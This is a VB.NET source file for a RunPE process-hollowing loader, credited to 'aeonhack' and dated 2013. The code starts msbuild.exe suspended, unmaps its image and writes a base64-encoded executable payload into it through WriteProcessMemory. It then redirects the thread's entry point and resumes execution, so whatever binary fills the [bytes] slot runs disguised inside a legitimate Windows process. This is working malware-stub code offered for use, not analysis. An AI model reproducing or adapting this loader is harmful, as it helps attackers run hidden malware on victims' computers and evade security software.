﻿Imports System.Runtime.InteropServices
Imports System.Threading
Imports System.Reflection
Imports System.Text
Imports System.Security

'------------------
'Creator: aeonhack
'Site: elitevs.net
'Created: 02/15/2013
'Changed: 05/12/2013
'Version: 1.0.0.7
'------------------

Class Client
    Sub Main()
        Dim Target As String = System.Environment.GetEnvironmentVariable("WINDIR") & "\Microsoft.NET\Framework\v2.0.50727\msbuild.exe" 'vbc, csc, msbuild, etc should all work too.
        Dim Command As String = ""
        Dim data As Byte() = System.Convert.FromBase64String([bytes])
        Try
            RunPE.Run(Target, Command, data, False)
        Catch ex As System.Exception
            RunPE.Run(Target, Command, data, True)
        End Try
    End Sub
End Class

Class RunPE

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="CreateProcess", CharSet:=CharSet.Unicode), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function CreateProcess(ByVal applicationName As String, ByVal commandLine As String, ByVal ProcessAttributes As System.IntPtr, ByVal threadAttributes As System.IntPtr, ByVal inheritHandles As Boolean, ByVal creationFlags As UInteger, ByVal environment As System.IntPtr, ByVal currentDirectory As String, ByRef startupInfo As STARTUP_INFORMATION, ByRef ProcessInformation As Process_INFORMATION) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="GetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function GetThreadContext(ByVal thread As System.IntPtr, ByVal context As Integer()) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="Wow64GetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function Wow64GetThreadContext(ByVal thread As System.IntPtr, ByVal context As Integer()) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="SetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function SetThreadContext(ByVal thread As System.IntPtr, ByVal context As Integer()) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="Wow64SetThreadContext"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function Wow64SetThreadContext(ByVal thread As System.IntPtr, ByVal context As Integer()) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function ReadProcessMemory(ByVal Process As System.IntPtr, ByVal baseAddress As Integer, ByRef buffer As Integer, ByVal bufferSize As Integer, ByRef bytesRead As Integer) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="WriteProcessMemory"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function WriteProcessMemory(ByVal Process As System.IntPtr, ByVal baseAddress As Integer, ByVal buffer As Byte(), ByVal bufferSize As Integer, ByRef bytesWritten As Integer) As Boolean
    End Function

    <System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint:="NtUnmapViewOfSection"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function NtUnmapViewOfSection(ByVal Process As System.IntPtr, ByVal baseAddress As Integer) As Integer
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="VirtualAllocEx"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function VirtualAllocEx(ByVal handle As System.IntPtr, ByVal address As Integer, ByVal length As Integer, ByVal type As Integer, ByVal protect As Integer) As Integer
    End Function

    <System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint:="ResumeThread"), System.Security.SuppressUnmanagedCodeSecurity> Private Shared Function ResumeThread(ByVal handle As System.IntPtr) As Integer
    End Function

    <System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack:=1)> Private Structure Process_INFORMATION
        Public ProcessHandle As System.IntPtr
        Public ThreadHandle As System.IntPtr
        Public ProcessId As UInteger
        Public ThreadId As UInteger
    End Structure

    <System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack:=1)> Private Structure STARTUP_INFORMATION
        Public Size As UInteger
        Public Reserved1 As String
        Public Desktop As String
        Public Title As String

        <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> Public Misc As Byte()

        Public Reserved2 As System.IntPtr
        Public StdInput As System.IntPtr
        Public StdOutput As System.IntPtr
        Public StdError As System.IntPtr
    End Structure

    Public Shared Function Run(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
        For I As Integer = 1 To 5
            If HandleRun(path, cmd, data, compatible) Then Return True
        Next

        Return False
    End Function

    Private Shared Function HandleRun(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
        Dim ReadWrite As Integer
        Dim QuotedPath As String = String.Format("""{0}""", path)

        Dim SI As New STARTUP_INFORMATION
        Dim PI As New Process_INFORMATION

        SI.Size = CUInt(System.Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUP_INFORMATION)))

        Try
            If Not String.IsNullOrEmpty(cmd) Then
                QuotedPath = QuotedPath & " " & cmd
            End If

            If Not CreateProcess(path, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, False, 4, System.IntPtr.Zero, Nothing, SI, PI) Then Throw New System.Exception()

            Dim FileAddress As Integer = System.BitConverter.ToInt32(data, 60)
            Dim ImageBase As Integer = System.BitConverter.ToInt32(data, FileAddress + 52)

            Dim Context(179 - 1) As Integer
            Context(0) = 65538

            If System.IntPtr.Size = 4 Then
                If Not GetThreadContext(PI.ThreadHandle, Context) Then Throw New System.Exception()
            Else
                If Not Wow64GetThreadContext(PI.ThreadHandle, Context) Then Throw New System.Exception()
            End If

            Dim Ebx As Integer = Context(41)
            Dim BaseAddress As Integer

            If Not ReadProcessMemory(PI.ProcessHandle, Ebx + 8, BaseAddress, 4, ReadWrite) Then Throw New System.Exception()

            If ImageBase = BaseAddress Then
                If Not NtUnmapViewOfSection(PI.ProcessHandle, BaseAddress) = 0 Then Throw New System.Exception()
            End If

            Dim SizeOfImage As Integer = System.BitConverter.ToInt32(data, FileAddress + 80)
            Dim SizeOfHeaders As Integer = System.BitConverter.ToInt32(data, FileAddress + 84)

            Dim AllowOverride As Boolean
            Dim NewImageBase As Integer = VirtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64)

            'This is the only way to execute under certain conditions. However, it may show
            'an application error probably because things aren't being relocated properly.

            If Not compatible AndAlso NewImageBase = 0 Then
                AllowOverride = True
                NewImageBase = VirtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64)
            End If

            If NewImageBase = 0 Then Throw New System.Exception()

            If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ReadWrite) Then Throw New System.Exception()

            Dim SectionOffset As Integer = FileAddress + 248
            Dim NumberOfSections As Short = System.BitConverter.ToInt16(data, FileAddress + 6)

            For I As Integer = 0 To NumberOfSections - 1
                Dim VirtualAddress As Integer = System.BitConverter.ToInt32(data, SectionOffset + 12)
                Dim SizeOfRawData As Integer = System.BitConverter.ToInt32(data, SectionOffset + 16)
                Dim PointerToRawData As Integer = System.BitConverter.ToInt32(data, SectionOffset + 20)

                If Not SizeOfRawData = 0 Then
                    Dim SectionData(SizeOfRawData - 1) As Byte
                    System.Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length)

                    If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New System.Exception()
                End If

                SectionOffset += 40
            Next

            Dim PointerData As Byte() = System.BitConverter.GetBytes(NewImageBase)
            If Not WriteProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ReadWrite) Then Throw New System.Exception()

            Dim AddressOfEntryPoint As Integer = System.BitConverter.ToInt32(data, FileAddress + 40)

            If AllowOverride Then NewImageBase = ImageBase
            Context(44) = NewImageBase + AddressOfEntryPoint

            If System.IntPtr.Size = 4 Then
                If Not SetThreadContext(PI.ThreadHandle, Context) Then Throw New System.Exception()
            Else
                If Not Wow64SetThreadContext(PI.ThreadHandle, Context) Then Throw New System.Exception()
            End If

            If ResumeThread(PI.ThreadHandle) = -1 Then Throw New System.Exception()
        Catch
            Dim P As System.Diagnostics.Process = System.Diagnostics.Process.GetProcessById(CInt(PI.ProcessId))
            If P IsNot Nothing Then P.Kill()

            Return False
        End Try

        Return True
    End Function

End Class